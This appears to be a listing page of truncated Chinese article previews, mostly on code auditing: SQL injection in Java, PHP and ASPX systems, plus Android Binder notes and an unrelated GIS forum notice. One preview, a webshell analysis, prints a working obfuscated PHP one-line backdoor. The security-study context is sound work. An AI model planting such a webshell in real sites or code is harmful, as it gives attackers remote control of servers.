0x00 前言 艰难徘徊这么久,终于迈出第一步,畏畏缩缩是阻碍大多数人前进的绊脚石,共勉. 系统是租车系统,这个系统是Adog师傅之前发在freebuf(http://www.freebuf.com/articles/web/162910.html)的,他审的时候没有发现sql注入,但在评论中有个师傅说有前台sql注入. 那么我就来找找前台的sql注入吧,虽说是java但其实代码审计的点都是通用的,万变不离其宗. 扯远了,这篇文章,算是踏入java代码审计领域的开篇. 0x01 基础环境搭建 源…

怎么做?2.1 定义接口: 写IHelloService.aidl文件, 上传, 编译, 得到IHelloService.java 里面有Stub : onTransact, 它会分辨收到数据然后调用sayhello, sayhello_to有Proxy : 提供有sayhello, sayhello_to两个函数, 它们会构造数据然后发送给server (这样我们就不用像C++那样实现BnHelloService和BpHelloService了) 2.2 实现服务类: HelloService…

logcat TestServer:* TestClient:* HelloService:* *:S &CLASSPATH=/mnt/android_fs/TestServer.jar app_process / TestServer &CLASSPATH=/mnt/android_fs/TestClient.jar app_process / TestClient helloCLASSPATH=/mnt/android_fs/TestClient.jar app_process / T…

Java实现中client端的RPC层(java实现)如何通过JNI来调用IPC层(C++实现)发送数据 TestServer通过addService向Service_manager注册的时候TestServer是Client端,Service_manager是Server端: TestClient通过getService向Service_manager请求服务的时候TestClient是Client端,Service_manager是Server端: TestClient调用RPC层的sayh…

如果知道了进程号:通过ls /proc/进程号/task 可以看到所有线程    cat /proc/进程号/task/线程号/comm  可以达到线程名字(主线程是main,主线程号就是进程号) dalvikvm //android上运行的虚拟机,其接受的是dex格式的文件,所以在android上运行的时候class文件需要转换成dex才能执行达尔维克 CLASSPATH=... app_process [java-options] cmd-dir start-class-name [opti…

出处: 九零SEC连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059 ---------------------------------------------------------- team:xdsec&90sec author:wilson blog:http://blog.wils0n.cn/ 文章链接:wilson's blog_php代码审计基础笔记[求人气~~] ----------------------…

今天和大家分享一下aspx网站的代码审计,漏洞类型就是SQL注入和cookie欺骗. 本文作者:i春秋签约作家——非主流 今天看的cms名字叫做:XX星员工请假系统 我们首先看一下网站的目录结构: 其中,很明显可以看到bin目录下面都是dll文件,也就是aspx网站的源码:install目录就是安装目录:admin目录就是后台目录…etc. 我们今天的目标是纯白盒审计,一切只看代码.下面就是正题咯 先看login.aspx吧,毕竟登录框,说不定就有注入呢? 其中inherits的值就是这个文件的…

WebShell代码分析溯源(七) 一.一句话变形马样本 <?php $e = $_REQUEST['e'];$arr = array($_POST['POST'],);array_map(base64_decode($e), $arr);?> 二.代码分析 1.调整代码格式 2.分析代码 分析代码,首先使用REQUEST方法接收url中e参数传递的值,然后创建arr数组并把$_POST['POST']赋值给arr数组,然后使用array回调函数将自定义函数x(base64_decode($e…

江苏省会议中心 南京·钟山宾馆(2012年4月21-22日) 以"突破与提升"为主题的"2012高校GIS论坛"将于4月在南京举行,由南京大学和工程中心共同承办.高校GIS论坛每两年举办一次,已在北京九华山庄成功举办三届,现已发展成为国内高校GIS教育界最有权威,最具影响力的高端论坛. 赛迪网直播小组正在现场进行图文.微博直播——2012高校GIS论坛! 主持人:尊敬的李院长.曹省长.陈校长,“突破与提升2012高校GIS论坛”现在开幕!首先请允许我介绍出席今天开幕…

0x00 前言 看了一下博客内最新的文章,竟然是3月28号的,一个多月没写文章了,博客都长草了. 主要是临近毕业,事情繁多,也没有啥时间和心情静下来写.. 不过现在的话,毕业的东西告一段落了,几乎没啥事了,总算能静下来好好学习. 发了篇文章在t00ls,不过是精简版的,有些地方没有细讲.之前也有伙伴留言说,文章放到t00ls,有些没账号的朋友看不到.这里我搬运一下. 0x01 基础环境审计版本为V1.2最后更新时间:2018-04-20用到的工具:vscode,phpstudy 0x02 前台注…